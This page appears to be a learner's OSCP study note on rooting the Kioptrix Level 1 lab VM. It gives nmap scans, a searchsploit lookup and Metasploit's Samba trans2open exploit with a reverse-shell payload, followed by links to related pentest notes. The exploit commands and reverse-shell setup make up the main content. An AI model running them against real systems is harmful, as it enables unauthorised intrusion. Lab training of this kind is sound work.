Gaining Root with Metasploit

Platform: Kali Linux, Kioptrix Level 1

1. Find the IP of Kioptirx

nmap 10.0.0.0/24 -n -sP -sn

2. Scan the Kioptrix server and analyst the result.

nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN /root/kioptrix1_detailed.txt 10.0.0.20

3. Search samba exploit methods.

searchsploit samba 2.2

4. Open Metasploit.

msfconsole

5. Search and use the suitable module.

use exploit/linux/samba/trans2open

6. Set the metasploit options.

set rhost 10.0.0.20

7. Start the exploit but failed in the end.

exploit

8. Set the payload and Try gain.

set payload generic/shell_reverse_tcp

Root the target server.

OSCP Learning Notes - Exploit(1)的更多相关文章

  1. OSCP Learning Notes - Exploit(4)

    Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social- ...

  2. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  3. OSCP Learning Notes - Exploit(2)

    Compiling an Exploit Exercise: samba exploit 1. Search and download the samba exploit source code fr ...

  4. OSCP Learning Notes - Exploit(9)

    Tool: Metasploit 1. Start the msfconsole tool. msfconsole 2.Search ssh related modules. 3.Use the &q ...

  5. OSCP Learning Notes - Exploit(8)

    Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret se ...

  6. OSCP Learning Notes - Exploit(7)

    Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options ...

  7. OSCP Learning Notes - Exploit(6)

    Antivirus Bypassing Tools: Kali Linux Detection Platform: https://www.virustotal.com/gui/home/upload ...

  8. OSCP Learning Notes - Exploit(5)

    Java Applet Attacks Download virtual machines from the following website: https://developer.microsof ...

  9. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

随机推荐

  1. 开源一款超实用的 Dubbo 测试工具,已用半年,感觉很有feel~

    不知道你是否在工作中有遇到过类似情况: dubbo接口调试复杂,需要通过telnet命令或者通过consumer调用来触发. telnet语句参数格式复杂,每次编写都要小心谨慎,一旦出错又需重来. 复 ...

  2. 【JMeter_07】JMeter逻辑控制器__循环控制器<Loop Controller>

    循环控制器<Loop Controller> 业务逻辑: 根据所填写的循环次数,对当前节点下的取样器进行响应次数的循环请求,这里可以填写变量.整数.小数.字母.负数.各种符号等: 当填写整 ...

  3. PyCharm远程连接服务器简明教程

    转自本人知乎(https://zhuanlan.zhihu.com/p/149040742) 由于实验室的GPU都是放在远程服务器上,因此一直使用MobaXterm利用SSH远程跑实验,但是MobaX ...

  4. Elasticsearch的query phase和fetch phase

    对于一次query查询到数据返回到客户端,经历了两个过程  query phase和fetch phase的过程 query phase 查询阶段     fetch phase 获取阶段. 1 qu ...

  5. shiro之redis频繁访问问题

    目前安全框架shiro使用较为广泛,其功能也比较强大.为了分布式session共享,通常的做法是将session存储在redis中,实现多个节点获取同一个session.此实现可以实现session共 ...

  6. Buy a Ticket 【最短路】

    题目 Musicians of a popular band "Flayer" have announced that they are going to "make t ...

  7. Spring中使用注解时启用<context:component-scan/>

    在spring中使用注解方式时需要在spring配置文件中配置组件扫描器:http://blog.csdn.net/j080624/article/details/56277315 <conte ...

  8. python用类的方式创建线程---自创建类

    用类的方式创建线程---自创建类 import threadingimport time class MyThread(threading.Thread):#自建MyThread类继承threadin ...

  9. 【搬砖】/etc/passwd 文件结构

    文件的内容: 每个Linux都会有root账号,以此来说明,从内容上看,每行都使用[:]分隔(注意:每行前面的数字是行号,不是内容),所以一共有七部分内容,分别是: 1. 账号名称:root,用来对应 ...

  10. 关于延迟段创建-P1

    文章目录 1 疑问点 2 环境创建 2.1 创建用户 2.2 创建表test 2.3 查看表的段信息 2.4 延迟段创建相关参数 1 疑问点 P1页有句话说道: 在Oracle 11.2.0.3.0以 ...